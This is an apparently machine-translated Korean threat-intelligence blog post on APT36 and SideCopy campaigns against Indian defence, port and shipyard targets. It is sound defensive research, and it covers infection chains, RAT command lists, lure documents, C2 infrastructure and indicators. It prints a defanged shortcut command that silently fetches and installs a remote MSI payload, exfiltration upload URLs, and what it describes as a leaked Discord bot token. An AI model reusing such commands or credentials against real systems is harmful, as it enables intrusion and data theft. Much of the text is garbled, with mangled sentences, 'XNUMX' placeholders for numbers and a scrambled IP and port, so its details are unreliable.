• 제품 & 서비스
        • 클라우드

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • 온프레미스

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • 플랫폼

          • Malware Analysis Platform
        • 소기업

          • SOHO Total Edition
        • 서비스

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • 사이버 보안 및 Data Privacy Awareness
  • 솔루션
    • BFSI
    • 교육
    • 정부·공공
    • 의료
    • ITeS
    • 제조
  • 회사
    • 회사 소개 Seqrite
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 리소스
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 이해 Data Privacy
    • 위험 점수를 확인하세요
    • DPDP 대화
    • 개인 정보 보호 시간
Seqrite 실험실 블로그
영업팀에 문의 공격받고 있습니까?
  • 제품 & 서비스
        • 클라우드

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • 온프레미스

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • 플랫폼

          • Malware Analysis Platform
        • 소기업

          • SOHO Total Edition
        • 서비스

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • 사이버 보안 및 Data Privacy Awareness
  • 솔루션
    • BFSI
    • 교육
    • 정부·공공
    • 의료
    • ITeS
    • 제조
  • 회사
    • 회사 소개 Seqrite
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 리소스
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 이해 Data Privacy
    • 위험 점수를 확인하세요
    • DPDP 대화
    • 개인 정보 보호 시간
홈  /  Malware  / 파키스탄의 위협의 우산: 인도를 표적으로 삼는 사이버 작전의 융합 전술
파키스탄의 위협의 우산: 인도를 표적으로 삼는 사이버 작전의 융합 전술
25 7월 2024

파키스탄의 위협의 우산: 인도를 표적으로 삼는 사이버 작전의 융합 전술

Written by 사트윅 람 프라키
사트윅 람 프라키
Malware

An 오픈 디렉토리 호스팅 악성 코드 연결 투명 부족(APT36)에게 에 의해 발견되었습니다 SEQRITE 랩스 APT 팀. F추가 분석 공개 숨겨진 URL이 on 같은 도메인 포함 페이로드 에 의해 사용되는 그 하위 부서 APT 그룹 사이드카피. 타겟팅 인도 정부 기관 등 비행기 힘, 조선소와 항만 by Si복사 취소 is 관찰 m을 통해여러 개의 오픈 디렉토리 그 주인ed 그것의 er 페이로드. 에이 강한 상관관계 전에,se 그룹 와 함께 러스틱웹; 웹사이트 통합을 원활하게 구현해드립니다. 도메인/IP, C2 name, 미끼 파일s, 더 보기 겹침 되었습니다 관찰. 이 블로그에서 우리는 탐험할 것이다 전에,se 페이로드 and 전에, ove랩 본 ...동안 전에, 최근 증가하다 in 그런 캠페인.

중요한 발견들

APT 오버랩

  • 한 도메인에서 SideCopy와 APT36의 페이로드가 함께 호스팅되고 있으며, 각각 Windows와 Linux 환경을 표적으로 삼고 있는 것으로 나타났습니다.
  • SideCopy의 RAT 페이로드에 사용되는 C2 서버는 일반적으로 APT9과 관련된 일반 이름(WIN-P5NRMH6G8M36)을 가지고 있습니다.
  • 두 위협 그룹 모두 러스틱웹, 다양한 형식, 인프라 및 웹 서비스에서 동일한 유인 파일을 사용하여 감염 사슬을 구축하여 연결을 강화합니다.

사이드카피 감염

  • SideWinder와 동일한 업데이트된 HTA를 사용하여 탐지를 회피함으로써 완전히 탐지 불가능하게 만들었습니다(FUD). SideCopy의 스테이저에서 SideWinder APT 그룹의 RTF 파일을 호스팅하는 인코딩된 URL이 발견되었습니다.
  • 역방향 RAT는 '를 사용하여 MSI 패키지를 통해 전달됩니다.인도 공군 테마를 미끼로 사용했고, 메모리 내 역방향 RAT 변종도 발견되었습니다. DOTM 파일을 호스팅하는 다른 두 도메인에서 BAT 파일을 통해 역방향 RAT를 유포하는 더 많은 오픈 디렉터리가 발견되었으며, 이는 조선소와 항만을 표적으로 삼았습니다.
  • Cheex라는 문서와 이미지를 훔치는 데 사용되는 새로운 페이로드, 첨부된 드라이브에서 파일을 훔치는 USB 복사기, FileZilla 애플리케이션 및 SigThief 스크립트도 발견되었습니다.
  • 파키스탄 지역에서 안티바이러스를 대상으로 스테이저 우회 테스트가 진행 중인 것으로 확인되었습니다. 동시에, 일반적으로 독일 C2에서 관찰되는 인도 발 피해자 트래픽은 파키스탄 IP에서 IPsec 프로토콜을 통해 라우팅되고 있습니다. 브로페서 Team Cymru에서.
  • HTA의 메모리 내에서 실행되는 Geta RAT라는 새로운 .NET 기반 페이로드는 Async RAT의 브라우저 도용 기능을 통합합니다. Action RAT는 병렬로 사이드로딩됩니다. 참마.exe 대신에 credwiz.exe/reykeywiz.exe 그리고 다음과 같은 이름의 허니트랩 테마를 사용합니다. '왓츠앱 이미지' 보인다.

투명한 부족 감염

  • Linux 시스템을 대상으로 하는 Golang 기반 다운로더는 Google Drive에서 최종 페이로드를 가져오는 데 사용됩니다. 이 최종 페이로드는 최근 도메인에서 가져온 것으로 확인되었으며, 디스고모지 Volexity에서는 "SideCopy와의 약한 인프라 연결"이 언급되었습니다.
  • 그룹은 Poseidon이 유혹적인 테마를 가진 바탕 화면 바로 가기를 사용하여 Linux 플랫폼을 계속 표적으로 삼고 있습니다. 'P오스팅/Ph-III에 따른 이전 R회전식 T를 ransfer' 'TLP 및 날짜를 ​​사용하여 IP 주소를 블랙리스트에 추가' 그리고 '장기요양 체크리스트'.
  • Crimson RAT의 사용 '우타라칸드 선거 결과' 'TDS 청구 요약' FileZilla 애플리케이션을 내장한 미끼도 관찰되었습니다.

그림 1 – 중복되는 감염 사슬

중첩 공격

오픈 디렉토리에서 발견된 도메인은 다음과 같습니다. 캠퍼스 포털[.] 여러 폴더가 호스팅되어 있습니다. 이 폴더에는 APT36에 기인한 Golang 기반 Linux 페이로드가 포함되어 있지만, 동시에 SideCopy APT에 속하는 HTA 스테이저를 호스팅하는 여러 개의 숨겨진 URL이 발견되었습니다. 이 도메인은 원래 다양한 인도 입학 시험 안내용으로 사용되었으며, 트위터/유튜브에 마지막으로 게시된 것은 2016년이었습니다. 유사한 오픈 디렉토리도 있었습니다. 관찰 동일한 소프트웨어에서 이전에 SideCopy 스테이저를 호스팅했습니다. LiteSpeed 웹 서버. 이 경우 도메인은 리뷰할당[.]에서 유아교육 및 보육 서비스에 대한 또 다른 교육 포털에도 사용되었습니다.

그림 2 – SideCopy 스테이저를 사용하여 APT36 및 숨겨진 URL을 호스팅하는 Open Directory

디렉터리 중 하나에 ZIP 아카이브가 있는데, 여기에는 암호로 보호된 PDF 파일과 UPX로 압축된 ELF 바이너리가 포함되어 있습니다. 압축을 풀면 다운로더 역할을 하는 Golang 바이너리가 나타나는데, 이 바이너리는 먼저 암호 '745414'. 미끼 주제는 2023년 XNUMX월 이후 SideCopy가 진행한 여러 캠페인에서 관찰된 인터넷 사용에 대한 설문 조사입니다.

그림 3 – 인터넷 설문조사 유인물

그런 다음 Google Drive에서 다음 단계 페이로드를 다운로드합니다. 그누코어인포 숨겨진 디렉토리로 .x86_32-linux-gnu, 실행 가능하게 만들고 백그라운드에서 시작합니다. 지속성은 다음과 같은 두 개의 AutoStart 데스크톱 항목을 통해 설정됩니다. GNOME_Core.desktop GNULib_Update.desktop. bash 스크립트가 삭제되고 등록됩니다. 크론 아래에 표시된 대로 페이로드를 다운로드하고 중복 프로세스가 실행되지 않도록 하는 작업입니다.

그림 4 – 지속성 스크립트의 Golang 다운로더 프로세스

DISGOMOJI의 변형

최종 페이로드는 '라는 이름의 UPX로 압축된 Golang 기반 ELF 바이너리입니다.vmcoreinfo.txt'. 이것은 오픈소스 저장소를 기반으로 하는 원격 액세스 트로이 목마입니다. 불일치-c2Discord 서버를 C2로 사용하고 이모티콘을 사용하여 소통합니다. 볼 렉스 Discord 서버의 서버 ID와 봇 토큰이 런타임에 하드코딩되거나 다운로드되는 DISGOMOJI의 다양한 변형을 관찰했습니다. BID1.txt GID1.txt 에 ordai[.]quest. 이 버전에서는 Google Drive를 사용하여 다음 이름을 사용하여 두 번째 서버임을 나타냅니다.

파일 이름 자세한 내용 및 Google 드라이브 다운로드 링크
BID2.txt MTI0NjkwMDE2NTI1MjQ4NTM1Mg.GWqtv3.cZmv1ZIts2ClyZ6jcKKpRzkD_hChmEkfDcZKeM (Server ID)
hxxps://drive.google.com/uc?export=download&id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe
GID2.txt 1246900038160879688 (봇 토큰)
hxxps://drive.google.com/uc?export=download&id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t
GTK 테마 파싱.txt 2bf596603c432fa46b494dc3edd2d30f (MD5)
hxxps://drive.google.com/uc?export=download&id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_

존재하는 모든 오류 처리 메시지는 실제 기능에서 오도하려고 하지만 흥미로운 오류 이름 중 하나가 관찰됩니다.업데이트 오류 카바치 저장소: %v". 난독화된 파일 이름 GTK 테마 파싱.txt 다운로드되며, 연결된 USB 드라이브에서 로컬 디렉터리로 파일을 주기적으로 복사합니다. 크론 작업도 마찬가지로 영구적으로 유지되도록 설정되며, 이 파일은 이모티콘 기반 RAT를 사용하여 유출될 수 있습니다.

그림 5 – 난독화된 USB 도용 스크립트

DISGOMOJI는 처음에 기본 시스템 세부 정보를 수집하며 그 기능에는 스크린샷 찍기, 명령 실행, 웹 서비스에 파일 업로드가 포함됩니다.오시[.]앗 전송[.]sh), 디스코드 서버를 통해 파일을 다운로드 및 업로드하고, Firefox 브라우저 프로필을 가져오고, 확장자를 기반으로 파일을 찾아 유출할 수 있습니다. 마지막 항목은 펀자브어(파키스탄에서 가장 많이 사용되는 언어)로 "모든 지식을 알려드렸으니, 또 무엇을 원하십니까?"라는 의미의 고유 문자열을 가지고 있으며, 이는 데이터 유출에 적합합니다. 새로운 Windows 및 Linux 변종 PYSHELLFOX와 GLOBESHELL BlackBerry는 파일을 유출하고 Firefox 프로필을 훔쳤다고도 언급했습니다.

그림 6 – 유출 메시지

포세이돈의 변종

또한 Transparent Tribe의 Linux 데스크톱 바로 가기를 통해 Poseidon 에이전트의 지속적인 배포를 관찰했으며, 미끼 파일은 Google Drive에 유사하게 호스팅되었습니다. 피쿠마트리 gmail.com 핏팔콘0900 gmail.com 계정 소유자로서. The 세 다른 미끼 관찰 are 모두 다양한 인도 정부 문서와 관련이 있습니다. 이것들은  오스팅/이전 임원들의 부처 산하 국방 작년부터, 블랙리스트에 등록된 IP 주소 과 티엘피(TLP) & 날짜와 수표k LTC 청구 목록.

그림 7 – 포세이돈을 이용한 IP 블랙리스트 미끼(1)

그림 8 – 포세이돈을 포함한 체크리스트 미끼(2)

그림. 9 - 게시/전송 포세이돈이 있는 미끼(3)

사이드카피

최근 SideCopy 감염에서 발견된 URL을 기반으로, 유사한 HTA 스테이저 호스팅과 동일한 미끼가 확인되었습니다. 감염은 보관된 바로가기 파일로 시작되며, 이 파일은 동일한 도메인에 호스팅된 원격 HTA 파일을 실행하기 위해 MSHTA 프로세스를 시작합니다. 총 6개의 HTA 파일이 발견되었으며, 1.hta or 2.hta. 첫 번째 HTA 변종에는 두 개의 base64 디코딩 함수가 있는데, 하나는 JavaScript 기반이고 다른 하나는 ActiveX 객체를 사용합니다. .NET 버전 확인, AV 솔루션 설치, 페이로드 연결 및 문자열 디코딩, 그리고 마지막으로 DLL을 메모리 내에서 실행하고 디코이 파일을 전달하는 등 기능은 동일하게 유지됩니다.

그림 10 – HTA 스테이저 2nd 다른

두 번째 HTA 변종은 매우 난독화되어 있으며 작년부터 여러 기술을 사용하는 특정 시기에만 관찰되었습니다.

  • 사용자 정의 알파벳을 사용하여 base64와 유사한 인코딩된 문자열을 디코딩합니다.
  • XOR 기반 복호화(키: f551e832 및 bWqQ)
  • 1/2/5 문자마다 문자열 반전
  • 여러 키를 사용한 카이사르 암호 변환

그림 11 – HTA의 난독화 해제

전반적인 기능은 동일하게 유지되지만, 이러한 난독화 패턴은 작년부터 SideWinder APT의 HTA에서 발견되었습니다. 스크립트 어디에도 사용되지 않는 문자열에는 URL(cabinet-gov-pk[.]ministry-pk[.]net) 몇 년 전 SideWinder의 RTF 파일을 호스팅했던 곳입니다.

그림 12 – SideWinder URL을 사용한 SideCopy 스테이저(분석에서 얻은 의견)

인 메모리 프리보타 DLL은 디코이를 열고 AV 솔루션을 설치하는 일반적인 순서를 수행합니다. AV 솔루션에 따라, 예약된 작업(VBScript), 실행 레지스트리 키 또는 시작 바로 가기의 조합으로 지속성을 설정합니다. 궁극적으로 두 개의 추가 HTA 파일을 삭제하거나 ''에서 MSFTEDIT.dll(Action RAT)을 다운로드합니다.hxxps://campusportals.in//files//documents//backup//ap.txt' 측면에 로드된 참마.exe C64.188.27의 포트 144에서 5863[.]2에 연결됩니다.

그림 13 – SideWinder 도메인 호스팅 RTF 파일

삭제된 HTA 파일의 이름은 useH, useT, alphaT이며, 위에서 언급한 것과 동일한 HTA 기능을 가지고 있으며, 마지막에 메모리 내에서 DLL을 실행합니다. 두 개의 서로 다른 DLL이 발견되었는데, 하나는 C19용 명령 2개와 USB 파일 그래버를 포함하는 Reverse RAT입니다. 이 DLL은 새 드라이브가 연결될 때마다 파일과 폴더를 저장합니다. 두 번째는 C30용 명령 2개를 포함하는 새로운 .NET 기반 Geta RAT로, Firefox와 Chromium 기반 브라우저의 모든 계정, 프로필, 쿠키 데이터를 훔칠 수 있습니다. 이 브라우저 플러그인은 아래와 같이 Async RAT에서 차용되었습니다.

그림 14 – Geta RAT 대 비동기 RAT

아니 Command 기능
1 연결 끊김 연결을 닫습니다
2 시스템 정보 시스템 데이터(컴퓨터 이름, 사용자 이름, 화면 크기, 사용 가능한 메모리 및 총 메모리(물리적 및 가상), OS 세부 정보, 배터리 전원 상태, 시스템 가동 시간, 드라이버, 네트워크 세부 정보)를 가져옵니다.
3 피킬 특정 프로세스를 종료하고 프로세스 목록을 가져옵니다.
4 프로세스매니저 프로세스 목록 가져오기
5 소프트웨어 설치된 소프트웨어 받기
6 암호 모든 계정/프로필/쿠키에서 Firefox 및 Chromium 기반 브라우저 자격 증명을 가져옵니다.
7 RD 원격 데스크톱 스크린샷 가져오기
8 GetPcBounds 화면 크기 가져오기
9 현재 위치 설정 커서 위치 설정
10 GetHostsFile \etc\hosts 파일을 가져옵니다
11 호스트 파일 저장 지정된 위치에 \etc\hosts 파일을 저장합니다.
12 GetCPText 클립보드 내용 가져오기
13 CP텍스트 저장 지정된 위치에 클립보드 내용 저장
14 껍질 "cmd /C"를 통해 명령을 실행합니다.
15 녹음 시작 정의된 기능은 없지만 화면 캡처에 사용될 가능성이 가장 높습니다.
16 녹음 중지 정의된 기능은 없지만 화면 캡처에 사용될 가능성이 가장 높습니다.
17 녹음다운로드 정의된 기능은 없지만 화면 캡처에 사용될 가능성이 가장 높습니다.
18 드라이브 목록 드라이브 목록 가져오기
19 파일 목록 지정된 경로에 대한 파일 및 디렉토리 가져오기
20 mkdir 새 디렉토리 생성
21 rmdir 디렉터리 삭제
22 rn폴더 디렉토리 이름 바꾸기
23 MVD 디렉토리 이동
24 rmfile 파일 삭제
25 rn파일 파일 이름 바꾸기
26 공유 파일 파일 다운로드
27 운영 파일 실행
28 실행하다 1. DLL 사이드 로딩을 ​​통해 파일을 업로드하고 실행합니다.
2. "cmd /C netstat -ano"를 실행하여 서버 IP의 연결 상태를 가져옵니다.
3. AV 설치하기
29 addSys 레지스트리 또는 시작을 통해 지속성 설정
30 파일 업로드 파일을 올리다

CACTUS TORCH와 SILENT TRINITY를 닮은 두 가지 유사한 HTA 변종이 발견되었지만, 탐지를 완전히 피했습니다. 이들은 바로가기 파일을 통해 실행되며, 허니트랩과 미·중 교착 상태와 같은 공격 기법을 활용하여 최종 페이로드를 투하합니다.

그림 15 – 새로운 HTA 스테이저

이 새로운 HTA에서 발견된 차이점은 기능은 동일하게 유지된다는 것입니다.

  • Base64 디코딩 외에도, 지정된 길이의 데이터를 디코딩하는 또 다른 함수가 사용됩니다. 주로 내장 DLL은 이러한 함수를 사용하여 두 번 인코딩됩니다.
  • 디코이 DLL과 사이드로딩 DLL은 HTA에 별도로 내장되지 않고 .NET DLL 자체에 내장됩니다.
  • AV를 설치하기 위해 WMI 쿼리를 사용하지 않으며, .NET 버전을 가져오기 위해 VBScript를 사용하지 않습니다.
  • 중요한 점은 인스턴스를 생성하고 동적으로 호출하기 위한 대상이 지정되지 않았다는 것입니다.

그림 16 – 단순화된 HTA 버전

로딩 대신 프리보타 or SummitOfBion 메모리 내, BroaderAspect.dll 디코이를 삭제하고 여는 위치가 보입니다. 바이러스 백신 검사는 수행되지 않지만 레지스트리 실행 키는 지속성으로 설정되고 DLL(DUser.dll)은 다음을 통해 사이드로드됩니다. Rekeywiz대상 디렉토리는 'C:\Users\Public\BroadCastUSB\crezly.exe'이고 두 파일에 연결된 PDB 경로는 'E:\TestAssembly\obj\Debug\BroaderAspect.pdb'입니다.

그림 17 – MSHTA의 메모리 내에서 실행되는 DLL

역방향 RAT 캠페인

다양한 조선소, 항구, 심지어 공군과 관련된 미끼와 가짜 도메인을 이용한 역방향 RAT 감염 사례가 다수 관찰되었습니다. 이러한 모든 기관은 인도 정부 산하 국방부(MoD)와 항만·해운·수로부(MOPSW) 산하입니다.

그림 18 – 역방향 RAT 감염 및 표적

Reverse RAT의 독립형 변형은 동일한 타임라인 동안 MSI 패키지를 통해 배포됩니다. ZIP 파일 이름은 '2024 회계연도 급여 인상'에는 MSI 패키지를 다운로드하고 실행하기 위한 LNK 바로 가기가 포함되어 있습니다.

  • C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /i hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/

이 패키지는 아래 이미지와 같이 사용자 지정 작업 및 설치 과정에서 실행되는 .NET Confuser PE 파일로 구성됩니다. 역방향 RAT는 "C:\\ProgramData\\VSUpdates\\svirbre.exe” C19에 대한 동일한 2개 명령과 이에 대한 지속성은 다른 HTA 스크립트를 통해 설정됩니다. 파일로스.hta 실행 레지스트리 키를 사용하여.

아니 Command 기능
1 운영 파일 실행
2 명부 경로의 파일 또는 디렉토리 나열
3 피킬 실행중인 프로세스를 종료합니다
4 가까운 C2와의 연결을 닫습니다
5 이름 변경 파일 이름 바꾸기
6 화면 스크린 샷 찍기
7 업로드 C2에 파일 업로드
8 삭제 파일 삭제
9 등록하다 모든 레지스트리 키와 해당 값을 나열합니다.
10 방법 실행 중인 모든 프로세스 나열
11 프로그램 설치된 모든 프로그램 나열
12 다운로드 C2에서 파일 다운로드
13 생성 디렉토리 새 디렉토리 생성
14 셸 실행 cmd.exe를 사용하여 명령을 실행하거나 파일을 엽니다.
15 레그뉴키 새 레지스트리 키 만들기
16 클립 보드 클립보드 내용을 검색합니다
17 레그델키 레지스트리 키 삭제
18 다운로드exe 파일 다운로드 및 실행
19 클립보드 세트 클립보드 내용 설정

그림 19 – 역방향 RAT를 삭제하는 MSI 패키지

감염 사슬과 페이로드는 다음과 같습니다.

파일 이름 세부 정보
급여_인상_FY_2024.zip 수정일자 : 2024-06-03
급여 인상률 2024.pdf.lnk 기계 ID: cop125n, 수정 날짜: 2023-12-04
newpictures.png (MSI) 수정일: 2020-09-18, 작성자: MSTech Soft
Filmeos.exe .NET 컨퓨저 1.x
svirbre.exe(역방향 RAT) 키: winupdates@7
C2: defender.windowupdatecache[.]in/officialupdates

유출된 미끼에는 인도 공군 직원들에게 지급된 급여 인상 내역이 포함되어 있었습니다. 최근 문서로, 지급일을 2024년 XNUMX월로 명시하고 있습니다.

그림 20 – 인도 공군 급여 미끼

더 많은 오픈 디렉토리

7월에는 오픈 디렉토리를 가진 두 개의 도메인이 추가로 발견되었는데, 타임스탬프에서 확인된 바와 같이 신규 및 기존 SideCopy 페이로드를 모두 호스팅하고 있었습니다. 여기에는 역방향 RAT 캠페인에 사용된 여러 EXE, PNG, PDF, BAT 및 기타 문서가 포함되어 있습니다. 해당 도메인은 슬라이드파인더[.]닷컴 다른 도메인에서 페이로드를 가져오는 호스팅된 7월 샘플 마자곤독[.]닷컴, 2023년 XNUMX월에 템플릿 주입 공격을 위해 파일을 호스팅했습니다.

그림 21 – SideCopy 페이로드를 호스팅하는 오픈 디렉토리

두 개의 매크로 활성화 템플릿 문서가 명명됨 Aerospace.dotm tmps.dotm 감염 사슬이 시작되는 것이 관찰되었습니다. 문서를 열면 난독화된 서브루틴이 실행되어 호스팅된 PNG 파일을 일괄 스크립트로 다운로드합니다.08973422348.batHTTP 응답이 200이면 TEMP 디렉토리에 "를 저장합니다. 파일이 있으면 Shell 함수를 사용하여 배치 파일을 실행합니다.

그림 22 – 템플릿 문서의 VBA 매크로

템플릿 중 하나에서는 나중에 활성 문서의 첨부된 템플릿을 변경하는 UNLK 서브루틴을 호출합니다. Normal.dotm 사용자 디렉터리에 있는 템플릿을 다운로드한 후 변경 사항을 저장하지 않고 문서를 닫습니다. 오류가 발생하면 DVBP 서브루틴을 호출하여 문서에서 모든 VBA 구성 요소를 제거하여 모든 VBA 코드를 삭제합니다. 아래 배치 스크립트는 기본적으로 다음을 사용하여 역방향 RAT 페이로드를 PNG 형식으로 다운로드합니다. PowerShell을, 숨겨진 디렉토리에 복사하고 5분마다 실행되는 예약된 작업을 만듭니다.

그림 23 – 역방향 RAT를 다운로드하기 위한 배치 스크립트

미끼 파일 편지002.pdf 또한 동시에 다운로드 및 열람이 가능하며, 이는 2024년 XNUMX월 당시 항만·해운·수로부 산하 코친 조선소(Cochin Shipyard Limited)의 계약 세부 정보와 일치합니다. 이 모든 월별 계약 세부 정보는 다음과 같습니다. 공개적으로 합법적인 도메인에서. 19개 명령을 수신하는 것 외에도 Reverse RAT는 다른 파일을 다운로드합니다. 마자곤독[.]닷컴 도메인은 국방부의 공식 Mazagon Dock Shipbuilders Limited를 모방합니다. 마자곤독[.]인 웹사이트. 이 도메인 호스팅 페이로드는 2023년 2월 캠페인에서도 유사한 타겟팅으로 Revere RAT를 전송하는 것으로 관찰되었습니다. Reverse RAT에서 확인된 CXNUMX는 vocport[.]com/Contactus, 이는 항만, 해운, 수로부 산하 VO 치담바라나르 항만 당국의 도메인을 모방한 것입니다.

 

그림 24 – 코친 조선소 계약 세부 정보가 포함된 미끼

.NET의 점점 더 많은

특정 확장자를 가진 파일을 검색하고 저장하는 기능을 갖춘 새로운 .NET 기반 페이로드가 다운로드 및 실행됩니다. 이 페이로드는 이후 다음 서버로 유출되는데, 두 가지 샘플에서 확인할 수 있습니다.

  • hxxp://149.28.95.195/dakshf_upload.php
  • hxxps://googleservices[.]live/dakshf_upload.php

이 샘플에는 사용자 이름 "아래 소스 프로젝트의 PDB 경로도 포함되어 있습니다.죽은 뱀” cheex라는 이름을 가진 (이 이름을 사용하는 관련 없는 온라인 플랫폼이 존재합니다.) 12개의 폴더(바탕화면, 개인 문서, 일반 문서, 다운로드, 최근 문서)에서 DOCX, DOC, XLSX, XLS, PPTX, PPT, PDF, BAK, JPEG, JPG, PNG, TXT 등 XNUMX개 확장자를 가진 파일을 검사합니다.

C:\Users\Dead Snake\source\repos\cheex-folderwise\cheex\obj\Release\dlhost.pdb
C:\Users\Dead Snake\source\repos\cheex\cheex\obj\Debug\cheex.pdb

그림 25 – 파일 침출을 위한 새로운 페이로드

MSI를 통해 제공된 위의 Reverse RAT에서 볼 수 있듯이, 연결된 USB 장치에서 파일 유출 기능이 포함되어 있었지만, 이제는 완전히 별도의 모듈로 제공됩니다. 모든 드라이브 문자가 열거되고, 파일은 동일한 IP 주소에 업로드되기 전에 백그라운드 워커를 사용하여 TEMP 디렉터리에 복사됩니다. 두 샘플에서 관찰된 PDB 경로는 다음과 같습니다.

e:\DBD\MA\Miscelleneous\Usb-Copier\Usb-Copier\FileCorrupter\obj\x86\Release\AdobeReaders.pdb
e:\DBD\MA\Miscelleneous\Usb-Copier\Usb-Copier\FileCorrupter\obj\x86\Debug\AdobeReaders.pdb

관찰된 다른 파일에는 매크로가 활성화된 문서, 미끼, FileZilla 애플리케이션(파일 전송에 사용됨) 및 오픈 소스 Python 스크립트가 있습니다. 시그시프 서명을 훔치고 추가하는 데 사용되었으며 이전 캠페인과 관련하여 호스팅되었습니다.

  • 해군 프로젝트 지불 섹션 보고서 29092023.docx
  • 해군 프로젝트 지불 섹션 보고서 131023.docx
  • 프로젝트 및 서비스 섹션 보고서 10102023.docx
  • 편지002.pdf
  • 해군 프로젝트.pdf

2023년 캠페인에 사용된 다른 미끼 문서도 같은 도메인에서 발견되었습니다. 이는 정부 VO 치담바라나르 항만청의 입항 허가 및 해군 프로젝트 관련 공급업체의 송장 상태와 관련이 있습니다. 이러한 미끼 문서는 공개적으로 사용 가능한 문서.

그림 26 – 2023년 XNUMX월 캠페인의 해군 항구 테마 미끼

그림 27 – 2023년 XNUMX월 캠페인의 해군 프로젝트 청구서 테마 미끼

인프라 및 귀속

지금까지의 분석 결과, 파키스탄과 연계된 세 개의 APT 그룹 간에 중복되는 부분이 발견되었습니다. Transparent Tribe는 Golang, Python 등 다양한 기법과 언어를 사용하는 것으로 알려져 있으며, Operation RusticWeb은 Rust 기반 페이로드를 사용했습니다. 두 그룹 모두 오시[.]앗 웹 서비스, 두 개의 동일한 PDF 미끼 문서 및 해당 가짜 도메인은 BlackBerry와 Volexity에서 관찰한 것과 동일한 IP 주소로 확인되었습니다.

그림 28 – 파키스탄 APT 중복

마찬가지로 SideCopy와 APT36 사이의 중복은 미끼와 같은 것으로 관찰되었습니다. 리눅스 스테이저 각각 Ares RAT와 Poseidon을 투하하기 위해 탑재량은 다음과 같습니다. 알라코어 RAT C2의 일반 명칭입니다. RusticWeb은 APT36과 중간에서 높은 신뢰도로 직접 연결되어 있으며, SideCopy가 APT36의 하위 팀 역할을 하는 것과 유사합니다.

페이로드를 호스팅하는 데 사용되는 가짜/침해된 도메인은 다음 IP 주소로 확인되며, 그 중 두 개는 WIN-BEJO0EMFO5K라는 일반 이름을 가지고 있습니다.

도메인 IP ASN
캠퍼스 포털[.] 192.64.117[.]203 AS22612 – 네임칩
마자곤독[.]닷컴 172.67.217[.]17
CN=WIN-BEJO0EMFO5K
AS13335 – 클라우드플레어
슬라이드파인더[.]닷컴 103.133.215[.]65
CN=WIN-BEJO0EMFO5K
AS133643 – Ewebguru, 인도
dipl[.]사이트 151.106.117[.]91 AS47583 – 호스팅어
utkalsevasamitikanjurmag[.]in 162.0.209[.]114 AS22612 – 네임칩

C2 서버를 살펴보면 IP 64.188.27[.]144 동일한 포트에서 Action RAT 및 Geta RAT와 함께 사용되었지만 Reverse RAT C2도 사용되었습니다. checkdailytips.servehttp[.]com 해당 IP로 확인되었습니다. 이와 관련된 일반 이름 WIN-P9NRMH5G6M8 APT2의 대부분 C36 서버에서 발견되었습니다.

그림 29 – APT36의 일반 이름을 가진 IP

도메인 vocport[.]com 2023년 2월부터 과거 캠페인과 마찬가지로 현재에도 사용되고 있습니다. 관찰된 모든 CXNUMX 서버의 Whois 세부 정보와 해당 페이로드는 다음과 같습니다.

IP ASN Payload
vocport[.]com
104.21.40[.]190
172.67.156[.]79
AS13335 – 클라우드플레어 역방향 RAT
defender.windowupdatecache[.]in
172.67.128[.]127
AS13335 – 클라우드플레어 역방향 RAT
checkdailytips.servehttp[.]com
dns1.indianblog[.]xyz
64.188.27[.]144
AS8100 – QuadraNet

CN=WIN-P9NRMH5G6M8

리버스 RAT, 액션 RAT, 게타 RAT
googleservices[.]live
149.28.95[.]195
AS13335 – 클라우드플레어
AS20473 – 추파
치즈, USB 복사기
84.247.170[.]237 AS51167 – 컨타보 새로운 RAT
165.22.221[.]71
178.128.166[.]148
152.42.162[.]105
161.35.207[.]209
159.65.146[.]80
157.245.100[.]177
AS 14061 – 디지털오션 포세이돈

이러한 상관관계와 이전 공격 체인을 기반으로, 이러한 캠페인은 APT36와 SideCopy 그룹 모두에 기인한 것으로 높은 신뢰도로 판단되며, 두 그룹 사이에 또 ​​다른 강력한 연관성이 확립되었습니다.

맺음말

파키스탄 APT 그룹과 연계된 스테이저/페이로드를 호스팅하는 여러 개의 오픈 디렉토리가 발견되었으며, 이 디렉토리는 인도 공군, 정부 기관 산하 항만 및 조선소를 표적으로 삼았습니다. Transparent Tribe, SideCopy, RusticWeb 간에 중복되는 부분이 발견된 다양한 사이버 작전이 관찰되었습니다.

APT36은 주로 리눅스 시스템을 표적으로 삼는 반면, SideCopy는 윈도우 시스템을 표적으로 삼아 새로운 페이로드를 추가하고 있습니다. 2024년 XNUMX분기에는 안드로이드 기반 악성코드를 사용하는 파키스탄 연계 위협 그룹이 인도를 표적으로 삼는 사례가 보고되었습니다. 여기에는 셀레스티얼 포스 작전(Operation Celestial Force)이 포함됩니다. 우주 표범 그리고 또 다른 새로운 그룹 WhatsApp을 활용하여 전달 스파이노트 RAT. 인도에 대한 지속적인 사이버 공격에 대비하여 필요한 예방 조치를 취하고 안전을 유지하는 것이 좋습니다.

SEQRITE 보호

  • 링크.사이드카피.48846.Gen_GC
  • MSI.사이드카피.48847.GC
  • JS.사이드카피.48848.Gen_GC
